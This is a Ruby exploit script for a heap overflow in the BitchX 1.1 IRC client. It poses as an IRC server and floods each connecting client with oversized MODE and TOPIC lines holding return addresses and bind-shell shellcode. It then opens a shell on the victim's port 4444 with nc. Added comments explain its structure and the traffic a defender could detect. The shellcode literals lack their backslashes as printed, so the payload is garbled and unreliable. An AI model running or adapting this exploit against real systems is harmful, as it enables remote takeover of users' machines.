
bitchx-heap.txt

Posted on 28 August 2007

#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actually vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appears to be several factors which
# restrict the reliability.
#######################################################
#
# Structure of this script (as reconstructed from the page):
#   1. a table of per-target addresses and a payload literal,
#   2. a TCPServer that poses as an IRC server, and
#   3. (below) an accept loop that replies to each connecting
#      IRC client with oversized MODE / TOPIC lines.
# From a defender's point of view the observable is a malicious
# *server*: the vulnerable party is the IRC client that connects.
require 'socket'

#the linux 2.6 target most effective atm
# Per-target address candidates as hex strings; only one entry is
# selected below. The 'freebsd' value 0x41414141 looks like a filler
# pattern rather than a real address — presumably an untested target.
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' => '0x8154d70','freebsd' => '0x41414141' }

# Payload literal, reproduced exactly as it is printed on the page.
# The trailing `+` on each line continues the single string expression.
shellcode =
#fork before binding a shell provides a clean exit
"x6ax02x58xcdx80x85xc0x74x05x6ax01x58xcdx80"+
#metasploit linux x86 shellcode bind tcp port 4444
"x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xfc"+
"x98xd8xb8x83xebxfcxe2xf4xcdx43x8bxfbxafxf2xdaxd2"+
"x9axc0x41x31x1dx55x58x2exbfxcaxbexd0xedxc4xbexeb"+
"x75x79xb2xdexa4xc8x89xeex75x79x15x38x4cxfex09x5b"+
"x31x18x8axeaxaaxdbx51x59x4cxfex15x38x6fxf2xdaxe1"+
"x4cxa7x15x38xb5xe1x21x08xf7xcaxb0x97xd3xebxb0xd0"+
"xd3xfaxb1xd6x75x7bx8axebx75x79x15x38"

# Listening port: first CLI argument, defaulting to the usual IRC port.
port = (ARGV[0] || 6667).to_i
# Binds on every interface; the script acts as the server side of the
# IRC session, so it waits for a client to connect to it.
sock = TCPServer.new('0.0.0.0', port)
# NOTE: although the comment on `targets` calls the plain 'linux 2.6'
# entry the most effective, the address actually used is the FC6 one.
# `ret` is a top-level variable and is mutated inside the accept loop.
ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------"
puts " [-] listening for incoming clients..."
# Accept loop: one iteration per connecting IRC client. Each client
# receives a burst of server-side replies, then repeated TOPIC lines,
# then repeated MODE lines carrying an oversized trailing parameter.
# On the wire, a "server" that sends MODE/TOPIC parameters hundreds
# of bytes long, dozens of times in a row, is the detectable signature.
while (client = sock.accept)
  # peeraddr => [family, port, hostname, ip]; index 3 is used later.
  ip = client.peeraddr
  # First line the client sends (its registration); only echoed.
  buffer = client.gets
  puts "[<] #{buffer}"
  # 13 copies of the little-endian packed address, used as a hostname.
  hostname = ([ret].pack('V')) * 13
  nick = "bannedit"
  #Fake server reply to connection
  # Numeric replies 001-005, 251-255 and the MOTD block 375/372/376,
  # concatenated into one buffer (each string ends with the `+`
  # continuation). `buffer` is reused here for the outgoing data.
  buffer = ":#{nick} MODE #{nick} :+iw "+
    ":0 001 #{nick} :biznitch-1.0 "+
    ":5 002 #{nick} :biznitch-1.0 "+
    ":6 003 #{nick} :a "+
    ":aaa 004 #{nick} :a "+
    ":aaa 005 #{nick} :a "+
    ":aaa 251 #{nick} :a "+
    ":aaa 252 #{nick} :a "+
    ":aaa 253 #{nick} :a "+
    ":aaa 254 #{nick} :a "+
    ":aaa 255 #{nick} :a "+
    ":aaa 375 #{nick} :a "+
    ":aaa 372 #{nick} :a "+
    ":aaa 376 #{nick} :a "
  # Built but never sent — the send below is commented out.
  join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick} "+
    ":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackers "
  puts "[>] sending fake server response"
  client.send(buffer, 0)
  sleep(2)
  # client.send(join, 0)
  # TOPIC line padded with 100 copies of the packed address, sent 21 times.
  topic = ":aaa TOPIC #hackers:"
  # `ret` lives outside this loop, so this and the later `+ 0x200`
  # accumulate across every accepted connection, not just this one.
  ret = ret + 0x200
  topic<< ([ret].pack('V')) * 100
  topic<< " "
  for i in 0..20
    client.send(topic, 0)
  end
  puts "[>] sending evil buffer"
  # MODE line whose prefix is the packed-address hostname and whose
  # trailing parameter is padding plus the payload literal; sent 6 times.
  # Padding and payload literals are reproduced as the page prints them.
  evilbuf = ":#{hostname} MODE "
  evilbuf<< "#{nick} :aaa"
  ret = ret + 0x200
  evilbuf<< ([ret].pack('V')) * 200
  evilbuf<< "x90" * (1126 - shellcode.length)
  evilbuf<< shellcode
  evilbuf<< "x90" * 40
  evilbuf<< " "
  for i in 0..5
    client.send(evilbuf, 0)
  end
  sleep(10) #wait for the shellcode to do its thing...
  puts "[+] exploit completed if successful port 4444 should be open"
  puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell... "
  # Child process runs nc toward the client's own IP (ip[3]) on 4444;
  # the parent falls straight back into accept() for the next client.
  fork {
    system("nc #{ip[3]} 4444")
    puts "[+] exiting shell dropping back to listener"
  }
end

 
